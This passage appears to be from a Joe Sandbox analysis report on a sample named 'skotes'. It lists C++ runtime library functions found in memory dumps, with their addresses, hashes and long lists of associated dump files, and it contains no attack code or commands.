Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: RoInitialize$RoUninitialize$combase.dll
API String ID: 348560076-3997890769
Opcode ID: 1cea4ff0453ef2d46a63054d9e65829d8f71bbd9523edd580e9693551392b113
Instruction ID: 3848bea56413c7b0cfc1bade7bfa33713e5f559e3cdc3c172e42eb52c14b929c
Opcode Fuzzy Hash: 1cea4ff0453ef2d46a63054d9e65829d8f71bbd9523edd580e9693551392b113
Instruction Fuzzy Hash: 2401C46469271159DF10B7766D09FAB39DCDF02304F20683FA541E6292EF6DD40046AD

Function 00496E1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SafeRWList.LIBCONCRT ref: 00496E73

Part of subcall function 00494E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00494E7F
Part of subcall function 00494E6E: List.LIBCMT ref: 00494E89

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00496E85
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00496EAA

Strings

eventObject, xrefs: 00496E7D

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1288476792-1680012138
Opcode ID: 5e03ec0491f81ab7c7ba08e5c6a48c2e6c1d74f290cc4e8a4740207c90a430c7
Instruction ID: 4ebb7e4129d97b655ac3274f30bf9e2a1456a2292ef8681543137edd2c4b8bf9
Opcode Fuzzy Hash: 5e03ec0491f81ab7c7ba08e5c6a48c2e6c1d74f290cc4e8a4740207c90a430c7
Instruction Fuzzy Hash: 2B11C279950204E6DF24EBA5CC8AFEF7B685F01744F30452BB508A61D1EB789A04C67D

Function 0049A0EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0049A102
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0049A126
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0049A139

Strings

pScheduler, xrefs: 0049A131

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 8012a900497c1d51e88d1c9b8b485d2d8fbfed186917343eb0b788b715272b5b
Instruction ID: 136281b119a4c1ae043ce9ccce8ab628ea860dbce1820f435962d0ef0550fcd6
Opcode Fuzzy Hash: 8012a900497c1d51e88d1c9b8b485d2d8fbfed186917343eb0b788b715272b5b
Instruction Fuzzy Hash: 5AF05036900104A7CF10FE95DC93D9EBB789E81718B20813FE40513242DF7CAA05C6EE

Function 004B67A9 Relevance: 6.2, APIs: 4, Instructions: 245COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 004B6902
__alloca_probe_16.LIBCMT ref: 004B6998
__freea.LIBCMT ref: 004B6A03
__freea.LIBCMT ref: 004B6A0F

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID:
API String ID: 1635606685-0
Opcode ID: 88be86e46e58b2ed34c82d3a3cef69ad98040e90660acb8e6bebbea4315e2fb2
Instruction ID: 097fa522b91a2437e6814462d762cfdfb3a0a27477515a824ca207843d94a317
Opcode Fuzzy Hash: 88be86e46e58b2ed34c82d3a3cef69ad98040e90660acb8e6bebbea4315e2fb2
Instruction Fuzzy Hash: C281D172D012459BDF20AE658881EEF7BA5EF0A354F1A415BE904B7281D73DCC05CBB9

Function 004A504E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 004A5115
___AdjustPointer.LIBCMT ref: 004A5138
___AdjustPointer.LIBCMT ref: 004A51D4

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: edbdd12a5b63c13203c73137bc506954b449b3da983e29fa60690484e129e7ec
Instruction ID: c8eb525f4b6d935f1764149f6ef0eb758416525b505f89ee1412b4a14ad22675
Opcode Fuzzy Hash: edbdd12a5b63c13203c73137bc506954b449b3da983e29fa60690484e129e7ec
Instruction Fuzzy Hash: 10512572A05A02AFDB249F15DA41B7B73B5EF32304F14452FE80187691E739ED41CB98

Function 004A4C15 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 004A4C66
TypeidsEqual.LIBVCRUNTIME ref: 004A4C8B
PMDtoOffset.LIBCMT ref: 004A4CA1
PMDtoOffset.LIBCMT ref: 004A4D22

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
